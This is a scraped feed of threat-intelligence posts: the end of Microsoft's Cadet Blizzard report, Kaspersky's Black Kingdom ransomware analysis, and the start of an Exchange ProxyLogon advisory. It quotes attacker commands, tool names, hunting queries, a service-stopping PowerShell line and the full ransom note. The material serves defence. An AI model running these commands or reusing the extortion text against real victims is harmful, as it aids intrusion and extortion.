Though there have been various forms of intersection in threat activity, when these groups have been observed operating independently, the tactics, techniques, and procedures (TTPs) and capabilities have often been distinct\u2014therefore making it operationally valuable to distinguish these activity groups.\n\n**Storm-0587**\n\nStorm-0587 is a cluster of activity beginning as early as April 2021 involving a series of weaponized documents predominantly delivered in phishing operations, usually to distribute a series of downloaders and [document stealers](<https://intezer.com/blog/malware-analysis/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/>). One of Storm-0587's trademark tools is [SaintBot](<https://www.malwarebytes.com/blog/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader>), an uncommon downloader that often appears in spear-phishing emails. This downloader can be customized to deploy almost anything as the payload, but in Ukraine, the malware often deploys a version of an [AutoIT information stealer](<https://gist.github.com/malwarezone/119bed274bc77b52122fa118f0a72618#file-stealer-au3-L2880>) that collects documents on the machine that threat actors deem of interest. This specific version of the malware has been named [OUTSTEEL by CERT UA](<https://cert.gov.ua/article/18419>) and has been observed in several attacks, such as a fake version of the Office of the President of Ukraine\u2019s website created in July 2021 that hid weaponized documents, including OUTSTEEL, that would download onto victims\u2019 machines when the documents are clicked.\n\n## Mitigation and protection guidance\n\n### Defending against Cadet Blizzard\n\nActivities linked to Cadet Blizzard indicate that they are comprehensive in their approach and have demonstrated an ability to hold networks at risk of continued compromise for an extended period of time. 
A comprehensive approach to incident response may be required in order to fully remediate Cadet Blizzard operations. Organizations can bolster security of information assets and expedite incident response by focusing on areas of risk based on actor tradecraft enumerated within this report. Use the included indicators of compromise to investigate environments and assess for potential intrusion.\n\n * Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single-factor authentication, to confirm authenticity and investigate any anomalous activity.\n * Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. _NOTE:_ Microsoft strongly encourages all customers to download and use password-less solutions like [Microsoft Authenticator](<https://www.microsoft.com/account/authenticator/>) to secure accounts.\n * Enable [controlled folder access (CFA)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/controlled-folders>) to prevent MBR/VBR modification.\n * [Block process creations originating from PSExec and WMI commands](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-process-creations-originating-from-psexec-and-wmi-commands>) to stop lateral movement utilizing the WMIexec component of Impacket.\n * Turn on [cloud-delivered protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus>) in Microsoft Defender Antivirus (turned on by default in Windows), or the equivalent for your chosen antivirus product, to cover rapidly evolving attacker tools and techniques. 
Cloud-based machine learning protections block the vast majority of new and unknown variants.\n\n### Hunting for Cadet Blizzard hands-on-keyboard activity\n\nTo uncover malicious hands-on-keyboard activities in environments, identify any unusual or unexpected commands or tools launched on systems as well as the presence of any unusual directories or files that could be used for staging or storing malicious tools. Use the common commands, tools, staging directories, and indicators of compromise listed below to help identify Cadet Blizzard intrusion and hands-on-keyboard activity in environments.\n\n**Common commands**\n\n * _systeminfo_ to fingerprint a device after lateral movement\n * _get-volume_ to fingerprint a device after lateral movement\n * _nslookup_ to research specific devices (IP) and FQDNs internally\n * _Get-DnsServerResourceRecord_ to conduct reconnaissance of an internal DNS namespace\n * _query session_ to profile RDP connections\n * _route print_ to enumerate routes available on the devices\n * _DownloadFile_ via PowerShell to download payloads from external servers\n\n**Common tool staging directories**\n\n * _C:\\ProgramData_\n * _C:\\PerfLogs_\n * _C:\\Temp_\n * _C:\\_\n * Subdirectories of legitimate (or fake) user accounts within _%APPDATA%\\Temp_\n * Subdirectories with the name _USOPublic_ in the path\n\n**Common tools**\n\n * Tor\n * Python\n * SurfShark\n * Teamviewer\n * Meterpreter named as _dbus-rpc.exe_ in known instances\n * IVPN\n * NGROK\n * _GOST.exe_ frequently masked as _USORead.exe_\n * reGeorg web shell\n\n**Indicators of compromise (IOCs)**\n\nIOC| Type| Description \n---|---|--- \njusticeua[.]org| Domain| Sender for non-weaponized emails containing only antagonistic messaging: _volodimir_azov@justiceua[.]org_ \n179.43.187[.]33| IP address| Hosted the JusticeUA operation between March and April 2022 \n3a2a2de20daa74d8f6921230416ed4e6| PE Import Hash| PE Import Hash matching WhisperGate malware 
\n3e4bb8089657fef9b8e84d9e17fd0d7740853c4c0487081dacc4f22359bade5c| SHA-256| Web shell - p0wnyshell (not unique to Cadet Blizzard) \n20215acd064c02e5aa6ae3996b53f5313c3f13625a63da1d3795c992ea730191| SHA-256| Web shell - p0wnyshell (not unique to Cadet Blizzard) \n3fe9214b33ead5c7d1f80af469593638b9e1e5f5730a7d3ba2f96b6b555514d4| SHA-256| Web shell - WSO Shell (not unique to Cadet Blizzard) \n23d6611a730bed886cc3b4ce6780a7b5439b01ddf6706ba120ed3ebeb3b1c478| SHA-256| Web shell \u2013 reGeorg (not unique to Cadet Blizzard) \n7fedaf0dec060e40cbdf4ec6d0fbfc427593ad5503ad0abaf6b943405863c897| SHA-256| Web shell \u2013 PAS (may not be unique to Cadet Blizzard) \n \n### Microsoft 365 Defender detections\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects behavioral components of techniques this threat actor uses as the following:\n\n * Behavior:Win32/WmiprvseRemoteProc\n\nMicrosoft Defender Antivirus detects the WhisperGate malware attributed to this threat actor with the following family:\n\n * WhisperGate\n\n**Microsoft Defender for Endpoint**\n\nThe following Microsoft Defender for Endpoint alerts can indicate associated threat activity:\n\n * Cadet Blizzard activity detected\n * Possible Storm-0587 activity detected\n\nThe following alerts might also indicate threat activity related to this threat. 
Note, however, that these alerts can also be triggered by unrelated threat activity.\n\n * Ongoing hands-on-keyboard attack via Impacket toolkit\n * Suspicious PowerShell command line\n * Suspicious WMI process creation\n\n**Microsoft Defender Vulnerability Management**\n\nMicrosoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:\n\n * CVE-2021-26084\n * CVE-2020-1472\n * CVE-2021-4034\n\n### Hunting queries\n\n**Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following queries to find related activity in their networks:\n\nCheck for WMIExec Impacket activity with common Cadet Blizzard commands\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ \"WmiPrvSE.exe\" and FileName =~ \"cmd.exe\"\n | where ProcessCommandLine matches regex \"2>&1\"\n | where ProcessCommandLine has_any (\"get-volume\",\"systeminfo\",\"reg.exe\",\"downloadfile\",\"nslookup\",\"query session\",\"route print\")\n \n\nFind PowerShell file downloads\n \n \n DeviceProcessEvents\n | where FileName == \"powershell.exe\" and ProcessCommandLine has \"DownloadFile\"\n \n\nScheduled task creation, command execution and C2 communication\n \n \n DeviceProcessEvents \n | where Timestamp > ago(14d) \n | where FileName =~ \"schtasks.exe\" \n | where (ProcessCommandLine contains \"splservice\" or ProcessCommandLine contains \"spl32\") and \n (ProcessCommandLine contains \"127.0.0.1\" or ProcessCommandLine contains \"2>&1\")\n \n\n### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u201cTI map\u201d) to automatically match indicators associated with Cadet Blizzard in Microsoft Defender Threat Intelligence (MDTI) with data in their workspace. 
If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the MDTI connector and analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>.\n\nMicrosoft Sentinel also has a range of detection and threat hunting content that customers can use to detect the post-exploitation activity detailed in this blog, in addition to the Microsoft 365 Defender detections listed above.\n\n * [Web Shell Activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Web Shells Threat Protection/Hunting Queries/WebShellActivity.yaml>)\n * [Commands executed by WMI](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Windows Security Events/Hunting Queries/CommandsexecutedbyWMIonnewhosts-potentialImpacket.yaml>)\n * [Potential Impacket Execution](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Attacker Tools Threat Protection Essentials/Hunting Queries/PotentialImpacketExecution.yaml>)\n * [Dumping LSASS using procdump](<https://github.com/Azure/Azure-Sentinel/blob/ccbb0e644810e0edf3b8ee4f284fd05ea1cc46ad/Hunting%20Queries/Microsoft%20365%20Defender/Credential%20Access/procdump-lsass-credentials.yaml>)\n * [Potential Microsoft Defender Tampering](<https://github.com/Azure/Azure-Sentinel/blob/c5e3281a8a30ea658ce8f8234a182a63ceb996d7/Hunting%20Queries/Microsoft%20365%20Defender/Defense%20evasion/PotentialMicrosoftDefenderTampering%5BSolarigate%5D.yaml>)\n\n### References\n\n * <https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>\n * <https://github.com/flozz/p0wny-shell>\n * <https://github.com/sensepost/reGeorg>\n * <https://cert.gov.ua/article/3947787>\n * <https://github.com/fortra/impacket>\n * 
<https://intezer.com/blog/malware-analysis/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/>\n\n## Further reading\n\nFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: <https://aka.ms/threatintelblog>.\n\nTo get notified about new publications and to join discussions on social media, follow us on Twitter at <https://twitter.com/MsftSecIntel>.\n\nThe post [Cadet Blizzard emerges as a novel and distinct Russian threat actor](<https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-06-14T16:00:00", "type": "mssecure", "title": "Cadet Blizzard emerges as a novel and distinct Russian threat actor", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-26084", "CVE-2021-4034", "CVE-2022-41040"], "modified": "2023-06-14T16:00:00", "id": 
"MSSECURE:1AFF4881941FA1030862F773DC84A4A8", "href": "https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2021-06-17T10:31:39", "description": "\n\nBlack Kingdom ransomware appeared on the scene back in 2019, but we observed some activity again in 2021. The ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065).\n\nThe complexity and sophistication of the Black Kingdom family cannot bear a comparison with other Ransomware-as-a-Service (RaaS) or Big Game Hunting (BGH) families. The ransomware is coded in Python and compiled to an executable using PyInstaller; it supports two encryption modes: one generated dynamically and one using a hardcoded key. Code analysis revealed an amateurish development cycle and a possibility to recover files encrypted with Black Kingdom with the help of the hardcoded key. The industry already [provided a script](<https://blog.cyberint.com/black-kingdom-ransomware>) to recover encrypted files in case they were encrypted with the embedded key.\n\n## Background\n\nThe use of a ransomware family dubbed Black Kingdom in a campaign that exploited the CVE-2021-27065 Microsoft Exchange vulnerability known as [ProxyLogon](<https://proxylogon.com/>) was [publicly reported](<https://twitter.com/vikas891/status/1373282066603859969>) at the end of March.\n\nAround the same time, we published a story on another ransomware family used by the attackers after successfully exploiting vulnerabilities in Microsoft Exchange Server. The ransomware family was DearCry.\n\nAnalysis of Black Kingdom revealed that, compared to others, it is an amateurish implementation with several mistakes and a critical encryption flaw that could allow decrypting the files due to the use of a hardcoded key. 
Black Kingdom is not a new player: it was observed in action following other vulnerability exploitation in 2020, such as CVE-2019-11510.\n\n**Date** | **CVE** | **Product affected** \n---|---|--- \nJune 2020 | CVE-2019-11510 | Pulse Secure \nMarch 2021 | CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 | Microsoft Exchange Server \n \n## Technical analysis\n\n### Delivery methods\n\nBlack Kingdom's past activity indicates that the ransomware was used in larger vulnerability exploitation campaigns related to Pulse Secure or Microsoft Exchange. [Public reports](<https://twitter.com/malwaretechblog/status/1373648027609657345>) indicated that the adversary behind the campaign, after successfully exploiting the vulnerability, installed a webshell in the compromised system. The webshell enabled the attacker to execute arbitrary commands, such as a PowerShell script for downloading and running the Black Kingdom executable.\n\n### Sleep parameters\n\nThe ransomware can be executed without parameters and will start to encrypt the system; however, it is possible to run Black Kingdom with a numeric argument, which it will interpret as the number of seconds to wait before starting encryption.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141438/BlackKingdom_ransomware_01.png>)\n\n**_'Sleep' parameter used as an argument_**\n\n### Ransomware is written in Python\n\nBlack Kingdom is coded in Python and compiled to an executable using PyInstaller. While analyzing the code statically, we found that most of the ransomware logic was coded into a file named _0xfff.py_. The ransomware is written in Python 3.7.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141523/BlackKingdom_ransomware_02.png>)\n\n**_Black Kingdom is coded in Python_**\n\n### Excluded directories\n\nThe adversary behind Black Kingdom specified certain folders to be excluded from encryption. 
The purpose is to avoid breaking the system during encryption. The list of excluded folders is available in the code:\n\n * Windows,\n * ProgramData,\n * Program Files,\n * Program Files (x86),\n * AppData/Roaming,\n * AppData/LocalLow,\n * AppData/Local.\n\nThe code that implements this functionality demonstrates how amateurishly Black Kingdom is written. The developers failed to use environment variables or regular expressions to avoid duplicating the code.\n\n### PowerShell command for process termination and history deletion\n\nPrior to file encryption, Black Kingdom uses PowerShell to try to stop all processes in the system that contain \"sql\" in the name with the following command:\n \n \n Get-Service*sql*|Stop-Service-Force2>$null\n\nOnce done, Black Kingdom will delete the PowerShell history in the system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141650/BlackKingdom_ransomware_03.png>)\n\n**_PowerShell commands run by Black Kingdom_**\n\nCombined with a cleanup of system logs, this supports the theory that the attackers try to remain hidden in the system by removing all traces of their activity.\n\n### Encryption process\n\nThe static analysis of Black Kingdom shows how it generates an AES-256 key based on the following algorithm.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141733/BlackKingdom_ransomware_04.png>)\n\n**_The pseudo-algorithm used by Black Kingdom_**\n\nThe malware generates a 64-character pseudo-random string. It then takes the MD5 hash of the string and uses it as the key for AES-256 encryption.\n\nThe code contains credentials for sending the generated key to the third-party service hxxp://mega.io. 
If the connection is unsuccessful, Black Kingdom encrypts the data with a hardcoded key available in the code.\n\nBelow is an example of a successful connection with hxxp://mega.io.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141817/BlackKingdom_ransomware_05.png>)\n\n**_Connection established with mega.io_**\n\nThe credentials for mega.io are hardcoded in base64 and used for connecting as shown below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143025/BlackKingdom_ransomware_06.png>)\n\n**_Hardcoded credentials_**\n\nThe file sent to Mega contained the following data.\n\n**Parameter** | **Description** \n---|--- \nID | Generated ID for user identification \nKey | Generated user key \nUser | Username in the infected system \nDomain | Domain name to which the infected user belongs \n \nBlack Kingdom will encrypt a single file if it is passed as a parameter with the key to encrypt it. This could allow the attacker to encrypt one file instead of encrypting the entire system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143102/BlackKingdom_ransomware_07.png>)\n\n**_Function for encrypting a single file_**\n\nIf no arguments are used, the ransomware will start to enumerate files in the system and then encrypt them using ten threads. It performs the following basic operations:\n\n 1. Read the file,\n 2. Overwrite it with an encrypted version,\n 3. Rename the file.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143137/BlackKingdom_ransomware_08.png>)\n\n**_The function used for encrypting the system_**\n\nBlack Kingdom can also read a file named target.txt from the same directory; the ransomware recursively collects files from the directories listed in that file and then encrypts them. Black Kingdom will also enumerate various drive letters and encrypt them. 
A rescue note will be delivered for each encrypted directory.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143222/BlackKingdom_ransomware_09.png>)\n\n**_Rescue note used by the ransomware_**\n\n### Encryption mistakes\n\nAmateur ransomware developers often end up making mistakes that can help decryption, e.g., poor implementation of the encryption key, or, conversely, make recovery impossible even after the victim pays for a valid decryptor. Black Kingdom will try to upload the generated key to Mega, and if this fails, use a hardcoded key to encrypt the files. If the files have been encrypted and the system has not been able to make a connection to Mega, it will be possible to recover the files using the hardcoded keys.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143256/BlackKingdom_ransomware_10.png>)\n\n**_Hardcoded key in Base64_**\n\nWhile analyzing the code statically, we examined the author's implementation of file encryption and found several mistakes that could affect victims directly. During the encryption process, Black Kingdom does not check whether the file is already encrypted or not. Other popular ransomware families normally add a specific extension or a marker to all encrypted files. However, if the system has been infected by Black Kingdom twice, files in the system will be encrypted twice, too, which may prevent recovery with a valid encryption key.\n\n### System log cleanup\n\nA feature of Black Kingdom is the ability to clean up system logs with a single Python function.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143334/BlackKingdom_ransomware_11.png>)\n\n**_The function that cleans up system logs_**\n\nThis operation will result in Application, Security, and System event viewer logs being deleted. 
The purpose is to remove any history of ransomware activity, exploitation, and privilege escalation.\n\n### Ransomware note\n\nBlack Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard with pyHook as it does so.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143409/BlackKingdom_ransomware_12.png>)\n\n**_Function to hook the mouse and keyboard_**\n\nWritten in English, the note contains several mistakes. All Black Kingdom notes contain the same Bitcoin address, which sets it apart from other ransomware families, which provide a unique address to each victim.\n \n \n ***************************\n | We Are Back ?\n ***************************\n \n We hacked your (( Network )), and now all files, documents, images,\n databases and other important data are safely encrypted using the strongest algorithms ever.\n You cannot access any of your files or services .\n But do not worry. You can restore everthing and get back business very soon ( depends on your actions )\n \n before I tell how you can restore your data, you have to know certain things :\n \n We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.\n \n To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )\n \n ***************************\n | What guarantees ?\n ***************************\n \n We understand your stress and anxiety. 
So you have a free opportunity to test our service by instantly decrypting one or two files for free\n just send the files you want to decrypt to (support_blackkingdom2@protonmail.com\n \n ***************************************************\n | How to contact us and recover all of your files ?\n ***************************************************\n \n The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .\n \n \n [ + ] Instructions:\n \n 1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com\n \n 2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :\n \n [ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]\n \n 3- confirm your payment by sending the transfer url to our email address\n \n 4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you,\n so that you can recover all your files.\n \n ## Note ##\n \n Dear system administrators, do not think you can handle it on your own. 
Notify your supervisors as soon as possible.\n By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.\n \n Your ID ==>\n FDHJ91CUSzXTquLpqAnP\n\nThe associated Bitcoin address is currently showing just two transactions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143451/BlackKingdom_ransomware_13.png>)\n\n**_Transactions made to a Bitcoin account_**\n\n### Code analysis\n\nAfter decompiling the Python code, we found that the code base for Black Kingdom has its origins in an open-source ransomware builder [available on GitHub](<https://github.com/BuchiDen/Ransomware_RAASNet/blob/master/RAASNet.py>).\n\nThe adversary behind Black Kingdom adapted parts of the code, adding features that were not originally present in the builder, such as the hardcoded key or communication with the mega.io domain.\n\n## Victims\n\nBased on our telemetry, we saw only a few hits by Black Kingdom, in Italy and Japan.\n\n## Attribution\n\nWe could not attribute Black Kingdom to any known adversary in our case analysis. Its involvement in the Microsoft Exchange exploitation campaign suggests opportunism, rather than a resurgence in activity from this ransomware family.\n\nFor more information, please contact: [financialintel@kaspersky.com](<mailto:financialintel@kaspersky.com>)\n\n## Appendix I \u2013 Indicators of Compromise\n\n**_Note:_**_ The indicators in this section were valid at the time of publication. 
Any future changes will be directly updated in the corresponding .ioc file._\n\n**File Hashes**\n\nb9dbdf11da3630f464b8daace88e11c374a642e5082850e9f10a1b09d69ff04f \nc4aa94c73a50b2deca0401f97e4202337e522be3df629b3ef91e706488b64908 \na387c3c5776ee1b61018eeb3408fa7fa7490915146078d65b95621315e8b4287 \n815d7f9d732c4d1a70cec05433b8d4de75cba1ca9caabbbe4b8cde3f176cc670 \n910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db \n866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc \nc25a5c14269c990c94a4a20443c4eb266318200e4d7927c163e0eaec4ede780a\n\n**Domain:**\n\nhxxp://yuuuuu44[.]com/vpn-service/$(f1)/crunchyroll-vpn\n\n**YARA rules:**\n \n \n import \"hash\"\n import \"pe\"\n rule ransomware_blackkingdom {\n \n meta:\n \n description = \"Rule to detect Black Kingdom ransomware\"\n author = \"Kaspersky Lab\"\n copyright = \"Kaspersky Lab\"\n distribution = \"DISTRIBUTION IS FORBIDDEN. DO NOT UPLOAD TO ANY MULTISCANNER OR SHARE ON ANY THREAT INTEL PLATFORM\"\n version = \"1.0\"\n last_modified = \"2021-05-02\"\n hash = \"866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc\"\n hash = \"910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db\"\n \n condition:\n \n hash.sha256(pe.rich_signature.clear_data) == \"0e7d0db29c7247ae97591751d3b6c0728aed0ec1b1f853b25fc84e75ae12b7b8\"\n }\n\n## Appendix II \u2013 MITRE ATT&CK Mapping\n\nThis table contains all TTPs identified during the analysis of the activity described in this report.\n\n**Tactic** | **Technique.** | **Technique Name. 
** \n---|---|--- \n**Execution** | **T1047** | **Windows Management Instrumentation** \n| | **T1059** | **Command and Scripting Interpreter** \n| | **T1106** | **Native API** \n**Persistence** | **T1574.002** | **DLL Side-Loading** \n| | **T1546.011** | **Application Shimming** \n| | **T1547.001** | **Registry Run Keys / Startup Folder** \n**Privilege Escalation** | **T1055** | **Process Injection** \n| | **T1574.002** | **DLL Side-Loading** \n| | **T1546.011** | **Application Shimming** \n| | **T1134** | **Access Token Manipulation** \n| | **T1547.001** | **Registry Run Keys / Startup Folder** \n**Defense Evasion** | **T1562.001** | **Disable or Modify Tools** \n| | **T1140** | **Deobfuscate/Decode Files or Information** \n| | **T1497** | **Virtualization/Sandbox Evasion** \n| | **T1027** | **Obfuscated Files or Information** \n| | **T1574.002** | **DLL Side-Loading** \n| | **T1036** | **Masquerading** \n| | **T1134** | **Access Token Manipulation** \n| | **T1055** | **Process Injection** \n**Credential Access** | **T1056** | **Input Capture** \n**Discovery** | **T1083** | **File and Directory Discovery** \n| | **T1082** | **System Information Discovery** \n| | **T1497** | **Virtualization/Sandbox Evasion** \n| | **T1012** | **Query Registry** \n| | **T1518.001** | **Security Software Discovery** \n| | **T1057** | **Process Discovery** \n| | **T1018** | **Remote System Discovery** \n| | **T1016** | **System Network Configuration Discovery** \n**Collection** | **T1560** | **Archive Collected Data** \n| | **T1005** | **Data from Local System** \n| | **T1114** | **Email Collection** \n| | **T1056** | **Input Capture** \n**Command and Control** | **T1573** | **Encrypted Channel** \n**Impact** | **T1486** | **Data Encrypted for Impact**", "cvss3": {}, "published": "2021-06-17T10:00:41", "type": "securelist", "title": "Black Kingdom ransomware", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-06-17T10:00:41", "id": 
"SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "href": "https://securelist.com/black-kingdom-ransomware/102873/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-10T12:32:23", "description": "\n\n## What happened?\n\nOn March 2, 2021, several companies [released](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) [reports](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) about in-the-wild exploitation of zero-day vulnerabilities inside Microsoft Exchange Server. The following vulnerabilities allow an attacker to compromise a vulnerable Microsoft Exchange Server. As a result, an attacker will gain access to all registered email accounts, or be able to execute arbitrary code (remote code execution or RCE) within the Exchange Server context. In the latter case, the attacker will also be able to achieve persistence on the infected server.\n\nA total of four vulnerabilities were uncovered:\n\n 1. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>). Server-side request forgery (SSRF) allows an attacker without authorization to query the server with a specially constructed request that will cause remote code execution. The exploited server will then forward the query to another destination. \n 2. [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is caused by unsafe data deserialization inside the Unified Messaging service. It potentially allows an attacker to execute arbitrary code (RCE). As a result of insufficient control over user files, an attacker is able to forge a body of data query, and trick the high-privilege service into executing the code.\n 3. [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>). This vulnerability allows an authorized Exchange user to overwrite any existing file inside the system with their own data. 
To do so, the attacker has to compromise administrative credentials or exploit another vulnerability such as SSRF CVE-2021-26855.\n 4. [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is similar to CVE-2021-26858 and allows an authorized attacker to overwrite any system file on the Exchange server. \n\nKaspersky [Threat Intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) shows that these vulnerabilities are already used by cybercriminals around the world.\n\n_Geography of attacks with mentioned MS Exchange vulnerabilities (based on KSN statistics) ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/04171325/microsoft_exchange_expoit_map.png>))_\n\nWe predict with a high degree of confidence that this is just the beginning, and we anticipate numerous exploitation attempts with the purpose of gaining access to resources inside corporate perimeters. Furthermore, we should note that there is typically a high risk of [ransomware](<https://securelist.com/targeted-ransomware-encrypting-data/99255/>) infection and/or data theft connected to such attacks. \n\n## How to protect against this threat?\n\nOur products protect against this threat with [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) components and detect exploitation with the following verdict: PDM:Exploit.Win32.Generic \nWe detect the relevant exploits with the following detection names:\n\n * Exploit.Win32.CVE-2021-26857.gen\n * HEUR:Exploit.Win32.CVE-2021-26857.a\n\nWe also detect and block the payloads (backdoors) being used in the exploitation of these vulnerabilities, according to our Threat Intelligence. 
Possible detection names include (but are not limited to):\n\n * HEUR:Trojan.ASP.Webshell.gen\n * HEUR:Backdoor.ASP.WebShell.gen\n * UDS:DangerousObject.Multi.Generic\n\nWe are actively monitoring the situation and additional detection logic will be released with updatable databases when required.\n\nOur [Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) helps to identify attacks in early stages by marking such suspicious actions with special IoA tags (and creating corresponding alerts). For example, here is PowerShell started by the IIS worker process (w3wp.exe) as a result of vulnerability exploitation: \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/07094546/microsoft_exchange_expoit_edr.png>)\n\nOur [Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service is also able to identify and stop this attack by using threat hunting rules to spot the exploitation itself, as well as possible payload activity.\n\nA thorough analysis of the attack will soon be available within the APT Intelligence Reporting service; please contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>) for details.\n\n## Recommendations\n\n * As Microsoft has already released an update to fix all these vulnerabilities, we strongly recommend updating Exchange Server as soon as possible.\n * Focus your defense strategy on detecting lateral movements and data exfiltration to the internet. Pay special attention to outgoing traffic to detect cybercriminal connections. Back up data regularly. 
